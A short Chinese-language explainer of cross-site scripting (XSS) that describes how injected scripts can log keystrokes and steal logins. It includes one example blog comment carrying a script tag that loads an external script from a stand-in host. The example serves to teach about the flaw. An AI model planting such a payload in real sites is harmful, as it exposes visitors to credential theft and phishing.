跨站腳本攻擊(Cross-Site Scrpting)簡稱為XSS,指的是向其他域中的頁面的DOM注入一段腳本,該域對其他用戶可見。惡意用戶可能會試圖利用這一弱點記錄用戶的擊鍵或操作行為,以竊取用戶的某些信息。在過去,包含用戶提交內容的站點特別容易成為這一漏洞的目標。例如:用戶在博客中提交評論,並且在其中包含類似於如下代碼的腳本塊:
Nice Bolg!Thanks for post that ...<script type="text/javascript" src="http://abc.org/aa.js"></script>
當瀏覽該頁面時,僅有評論是可見的,但對於每一個訪問該頁面的用戶,瀏覽器都將為該用戶下載一份外部腳本。在該外部腳本中可以窺探用戶的登錄信息或者其他屏幕內容,甚至重寫DOM以實現網絡釣魚的企圖。